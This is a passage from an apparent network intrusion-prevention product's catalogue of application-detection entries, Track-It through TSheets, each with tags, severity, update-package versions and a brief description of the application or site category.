Track-It

About this situation: Track-It usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-628-5211
Description: Track-It is a helpdesk and asset management software. The application uses a client-server as well as web-based architectures.
Back to top

TrackAbout

About this situation: Application TrackAbout detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrackAbout is a software-as-a-service solution to track, manage, maintain and optionally rent portable physical assets.
Back to top

Tracker

About this situation: Application Tracker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The PhaseWare Tracker product suite creates a fluid customer support experience with streamlined workflows, automated task processing, incident and performance management tools, and a supporting knowledge base application that enables timely, effective agent troubleshooting as well as customer self-service.
Back to top

Tracker-CRM

About this situation: Application Tracker-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tracker-CRM - Cloud CRM Software systems for businesses of all types.
Back to top

Tracker-Go

About this situation: Application Tracker-Go detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrackerGO is a Web Based CRM cloud solution that enables companies small, mid or large to manage their leads and collaboration as well as provides automation marketing.
Back to top

TrackingTime

About this situation: Application TrackingTime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrackingTime is a collaborative, cloud-based time tracking service that helps businesses of any size manage their projects, track working times and measure productivity.
Back to top

Trackjs

About this situation: Application Trackjs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trackjs - JavaScript Error Tracking for Modern JavaScript Web Applications
Back to top

Trackjumper

About this situation: Application Trackjumper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trackjumper - online Bug Tracking Software
Back to top

Trackolade

About this situation: Application Trackolade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trackolade allows you manage projects, to-do lists, discussions and team members in a centralized workspace
Back to top

Tracks

About this situation: Application Tracks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tracks is a software for simple sales tracking, CRM and sales pipeline management that integrates with Highrise CRM and Google Apps.
Back to top

TrackSmart

About this situation: Application TrackSmart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrackSmart - is professional online employee attendance tracking software.
Back to top

Trackur

About this situation: Application Trackur detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trackur is a social media monitoring tool designed to assist you in tracking what is said about you on the internet.
Back to top

Trackvia

About this situation: Trackvia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: TrackVia is a do it yourself workflow software platform for business users. TrackVia gives users the power to build custom work management applications with no programming required, and at a fraction of the cost of heavier enterprise solutions.
Back to top

TRACOM-Learning

About this situation: Application TRACOM-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Tracom Group is a training and development consultant. The company provides business consulting services, employment agency services, business facilities oversight, business administration services and management support services.
Back to top

TRACT-GoTransverse

About this situation: Application TRACT-GoTransverse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TRACTGoTransverse is the all-in-one activity, rating
Back to top

Tract-Systems

About this situation: Application Tract-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tract Systems is a provider of Field Services Management Software that helps mid-size businesses streamline day to day operational processes.
Back to top

Traction-Guest

About this situation: Application Traction-Guest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Traction Guest is a cloud-based, enterprise-grade guest management platform that presents visitors with a sign in experience.
Back to top

Tractis

About this situation: Application Tractis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With Tractis you can create, negotiate and sign contracts, 100percent online and guaranteed to be legally binding in the offline world.
Back to top

Trade-Desk

About this situation: Trade Desk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1769-5242
Description: Trade desk is an online advertiser.
Back to top

Trade-Promotion-Optimization-Planner

About this situation: Application Trade-Promotion-Optimization-Planner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TPO Planner is a white-space solution that integrates seamlessly with Trade Promotion Management (TPM) applications for closed loop trade promotion management. The application enables users to manage business constraints and to optimize to various objective functions.
Back to top

TradeGecko

About this situation: Application TradeGecko detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TradeGecko is a cloud-based inventory management platform for retailers and wholesalers. It offers data privacy, accounting sync, sales and purchase order management and intelligence reports.
Back to top

TradeKing

About this situation: Application TradeKing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TradeKing is a discount online brokerage firm, providing online trading tools for self-directed investors to buy and sell stocks, options, bonds and mutual funds via electronic trading platforms or by phone.
Back to top

TradeLink

About this situation: Application TradeLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TradeLink provides eBusiness, EDI solution and XML management system used to translate and exchange business documents.
Back to top

Tradepoint-360

About this situation: Application Tradepoint-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tradepoint 360 is a software design and manufacturing company that allows to manage enterprise in a single business management application.
Back to top

Tradeshift

About this situation: Application Tradeshift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tradeshift eProcurement brings AP automation and supplier management into one global network to transform the way businesses work together.
Back to top

Tradestation

About this situation: TradeStation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: TradeStation provides financial information such as stock quotes, stock exchange rates, corporate press releases and financial reports, and popular message boards for discussing a company's prospects and stock valuation.
Back to top

TradingTree

About this situation: Application TradingTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TradingTree is a platform where traders in a unique community come together to trade better together .
Back to top

TradingView

About this situation: Application TradingView detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TradingView offers the stock charts and a community of investors who are sharing trading ideas.
Back to top

Traditional Religions

About this situation: Sites that provide information about or promote Bahai, Buddhism, Christian Science, Christianity, Hinduism, Islam, Judaism, Mormonism, Shinto and Sikhism, as well as atheism.
Context: URL Application Context
Severity: 1
Tags: Religion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote Bahai, Buddhism, Christian Science, Christianity, Hinduism, Islam, Judaism, Mormonism, Shinto and Sikhism, as well as atheism.
Back to top

Tradogram

About this situation: Application Tradogram detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tradogram is a cloud-based procurement management software to help purchasing professionals plan, communicate, and control the process for direct and indirect procurement.
Back to top

TrafficJunky

About this situation: TrafficJunky usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1086-5242
Description: TrafficJunky is an on-line advertising service.
Back to top

TrainingToday-Enterprise

About this situation: Application TrainingToday-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrainingToday Enterprise is a corporate LMS system that comes with a library of EHS-related courses. Employers can also create custom content and training materials.
Back to top

Trakstar

About this situation: Application Trakstar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trakstar is a performance appraisal software solution that helps companies to align goals, give instant feedback to peers, and allows employees to access their appraisals at their leisure.
Back to top

Transamerica

About this situation: Application Transamerica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transamerica Corporation is a financial services company, provides insurance and investments for small to large organizations.
Back to top

Transcend

About this situation: Transcend usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Description: Transcend is a privacy platform.
Back to top

TransEra-HTBasic

About this situation: Application TransEra-HTBasic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HTBasic for Windows user interface includes all of the popular windows features including toolbars, status bar, pulldown menus, scroll bars and dialog boxes.
Back to top

Transferbigfiles.com

About this situation: TransferBIGFiles.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1017-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

TransFirst-TransLink

About this situation: Application TransFirst-TransLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TransLink is a user-friendly, online reporting system that helps you manage your merchant payment card business from any Internet-enabled device.
Back to top

Transfluent

About this situation: Application Transfluent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transfluent is a fully integrated translation solutions connecting business communication.
Back to top

Transifex

About this situation: Application Transifex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transifex is a continuous localization platform powering the process of launching products into multiple languages for companies with rapid development cycles.
Back to top

Transloadit

About this situation: Application Transloadit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transloadit is the easiest-to-use encoding service and offers not only video encoding, but also audio encoding, image resizing, upload progress bar, and more. On-demand scalable file uploading and transcoding.
Back to top

TransOps

About this situation: Application TransOps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TransOps is a company that provides transportation software solutions, including EDI software, freight quoting and carrier bid management systems, fleet maintenance systems, load board software, password synchronization and security compliance software, process manufacturing ERP systems, and transportation management solutions for the trucking, logistics, supply chain, and manufacturing industries.
Back to top

Transpara

About this situation: Application Transpara detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transpara designs and develops business intelligence solutions for mobile phones and desktops. The company provides Visual KPI, a Web based business intelligence application that offers monitoring, dashboard, alerts, and analytic services for iPhone, iPad, blackberry, android, windows, and Mac.
Back to top

Transporter

About this situation: Application Transporter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Transporter is dedicated to provide services for backup and storage data
Back to top

TravBuddy

About this situation: Application TravBuddy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TravBuddy - honest travel reviews, millions of travel buddies, and thousands of travel blogs to help plan your next trip.
Back to top

Travel

About this situation: Sites that provide information about or promote travel-related services and destinations.
Context: URL Application Context
Severity: 1
Tags: Travel, Productivity Loss, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote travel-related services and destinations.
Back to top

Travelbooster

About this situation: Application Travelbooster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Travel Booster is a SaaS, web-based software platform for Travel Agents, Tour Operators, TMCs, and Airline Vacation Companies. Travel Booster platform includes a comprehensive online booking engine
Back to top

Travelocity

About this situation: Travelocity usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Travelocity allows booking airline tickets, read reviews, reserve a hotel find deals on vacations, rental cars and cruises.
Back to top

Travian

About this situation: Travian usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Traxo

About this situation: Application Traxo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Traxo is a travel tool that helps users automatically create and keep travel itinerary.
Back to top

TrekkSoft

About this situation: Application TrekkSoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrekkSoft provides an online booking and reservation solution for activity providers, tour operators, travel agents, tourist offices and event organizers.
Back to top

Trello

About this situation: Application Trello detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trello lets you work more collaboratively and get more done. Trello's boards, lists, and cards enable you to organize and prioritize your projects in a fun, flexible, and rewarding way.
Back to top

Trend-Hunter

About this situation: Trend Hunter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Trend Hunter is an online trend community with a trend tracking research platform.
Back to top

Trend-Micro

About this situation: Trend Micro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Description: Trendmicro is a cybersecurity platform.
Back to top

Trend-Micro-ActiveUpdate

About this situation: Trend Micro Active Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-625-5211
Description: Trend Micro Active Update service usage detected.
Back to top

Trend-Micro-Cloud-One

About this situation: Trend Micro Cloud One usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1769-5242
Description: Security provider for physical, virtual and cloud servers.
Back to top

Trend-Micro-License-Update

About this situation: Trend Micro License Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-625-5211
Description: Trend Micro License Update service usage detected.
Back to top

Trend-Micro-OfficeScan-Management

About this situation: Trend Micro OfficeScan Management usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1638-5242
Description: Trend Micro Office Scan management service usage detected.
Back to top

Trend-Micro-VCS

About this situation: Trend Micro VCS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1638-5242
Description: Trend Micro Virus Control System (VCS) usage detected.
Back to top

Trendmicro-Update

About this situation: TRENDMicro Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-625-5211
Description: This event will give alert when online updates for TrendMicro products taking place.
Back to top

Tresorit

About this situation: Application Tresorit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tresorit is a secure cloud storage solution using encryption technology.
Back to top

Tribal-Fusion

About this situation: Application Tribal-Fusion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tribal Fusion is a performance display advertising provider. We enable advertisers to model, target and optimize online campaigns against our interest-based audiences, which are built to deliver display advertising performance.
Back to top

Tribe

About this situation: Application Tribe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tribe.net maintains a stable community of users and is making changes to ensure its future relevancy.
Back to top

Tribehr

About this situation: TribeHR usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: TribeHR is an online Human Resources Software for small and medium businesses which simplifies frustrating HR management challenges.
Back to top

TriggerApp

About this situation: Application TriggerApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TriggerApp is a project management app that combines collaboration, client management and invoicing in one easy to use, yet incredibly powerful, cloud-based app.
Back to top

Trillian

About this situation: Application Trillian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trillian - instant messenger for Windows, MacOS X, Android, iPhone, BlackBerry, Linux, and the Web. Supports Windows Live, Facebook, Twitter, Yahoo, MySpace, AIM, Email, Google Talk, ICQ, Jabber, IRC, Bonjour.
Back to top

Trillian-Web

About this situation: Trillian Web usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-628-5211
Description: Trillian is a proprietary multiprotocol instant messaging application for Windows, Mac OS X, iPhone OS and the Web.
Back to top

Trilogy

About this situation: Application Trilogy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trilogy provides technology of business services for automotive, insurance and telecom industries.
Back to top

Trimble

About this situation: Application Trimble detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trimble makes Global Positioning System
Back to top

TriNet-Hire

About this situation: Application TriNet-Hire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TriNet Hire - an applicant tracking system designed to help small and medium sized business hire faster, better and cheaper.
Back to top

Trinet-Perform

About this situation: Application Trinet-Perform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TriNet Group provides human resources solutions for small and midsize businesses in the United States and Canada.
Back to top

Trintech

About this situation: Application Trintech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trintech provides Cloud-based financial software solutions for the Record-to-Report process.
Back to top

Trion-Worlds

About this situation: Application Trion-Worlds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trion Worlds develops games and delivers social content across video game genres, gaming platforms and mass-market entertainment formats.
Back to top

TripAdvisor

About this situation: TripAdvisor usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1303-5242
Description: TripAdvisor is a travel website providing reviews of travel-related content. It also includes interactive travel forums. Source: Wikipedia
Back to top

TripCase

About this situation: Application TripCase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TripCase is a an itinerary management app that keeps travelers connected to their entire trip.
Back to top

TripIt

About this situation: Application TripIt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TripIt organizes travel plans into an itinerary that has all of your trip details in one place.
Back to top

Tripleseat

About this situation: Application Tripleseat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tripleseat is the Event Management Solution for owners and managers of restaurants, banquet facilities, and catering operations.
Back to top

Trippy

About this situation: Trippy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Trippy aims to simplify and improve travel planning through what they call friendsourcing. The app ties into users social networks, such as Facebook, to discover which friends, family and contacts have visited the considered destination whether it be that they have checked in, lived, worked, or studied there. Source: Wikipedia
Back to top

Tripwire

About this situation: Application Tripwire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tripwire is a provider of endpoint detection and response, security, compliance and IT operation solutions for enterprises, service providers and government agencies.
Back to top

Triton-Digital

About this situation: Application Triton-Digital detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Triton Digital is a technology company focused on the digital audio industry.
Back to top

Trivago

About this situation: Trivago usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-630-5211
Description: Trivago is an online service for searching and finding hotel prices.
Back to top

TriWest-Healthcare-Alliance

About this situation: Application TriWest-Healthcare-Alliance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TriWest Healthcare Alliance is acorporation that manages health benefits under the United States Department of Defense
Back to top

Trixbox

About this situation: Application Trixbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: trixbox is an open-source software PBX based on Asterisk.
Back to top

Tropo

About this situation: Application Tropo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tropo makes it simple to build phone and SMS applications. You use the web technologies you already know and Tropo's powerful cloud API to bring real-time communications to your apps.
Back to top

Trove

About this situation: Application Trove detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Trove has been working for years to develop domain-specific AI technology on top of communications, starting with email.
Back to top

Truecaller

About this situation: Truecaller usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Truecaller finds contact details globally given name or telephone number, and has an integrated caller ID service using Crowdsourcing to achieve call-blocking functionality and social media integration to keep the phonebook up-to-date with pictures and birthdays. The name Truecaller comes from the app being able to show the True name of the Caller. The client is available for Android, BlackBerry OS, iOS, Series 40, Symbian, BlackBerry, and Windows Phone.
Back to top

TrueForms-Online

About this situation: Application TrueForms-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrueForms Online provides Real Estate Forms for States, Associations, Companies and Indivduals. Forms packages, individual forms and custom forms.
Back to top

TrueShare

About this situation: TrueShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Description: TrueShare is an online file system which allows users to securely upload, share, store, backup, and distribute files.
Back to top

Trueshare.com

About this situation: TrueShare.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: TrueShare is a web based file system that puts your computer files where you need them, when you need them. When you store your computer files on TrueShare, your computing experience becomes more flexible, more secure, more simple, and more fun. You can access them from anywhere they are protected from loss and you can share them with anyone.
Back to top

Trulia

About this situation: Application Trulia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1730-5242
Description: Trulia is an online platform providing information on properties professionals for home buyers.
Back to top

Trumba

About this situation: Application Trumba detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trumba develops event calendar publishing technology that helps businesses publish, promote, and communicate events.
Back to top

Truphone-Local-Anywhere

About this situation: Application Truphone-Local-Anywhere detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Truphone is a global mobile network that operates its service internationally.
Back to top

Truprint

About this situation: Truprint usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

TrustedChoice

About this situation: Application TrustedChoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project CAP is industry initiative with the vision and resources to recapture and expand the independent channel
Back to top

TrustFax

About this situation: Application TrustFax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TrustFax - Online Fax Software to Send
Back to top

Trustpilot

About this situation: Application Trustpilot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trustpilot is an online review community helping consumers choose companies.
Back to top

Trustwave

About this situation: Application Trustwave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Trustwave helps businesses fight cybercrime, protect data and reduce security risk, give organizations the services and technologies they need to transform the way they plan, prepare, integrate and manage their information security and compliance programs.
Back to top

TryBooking

About this situation: Application TryBooking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TryBooking - online ticketing system
Back to top

TSheets

About this situation: Application TSheets detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
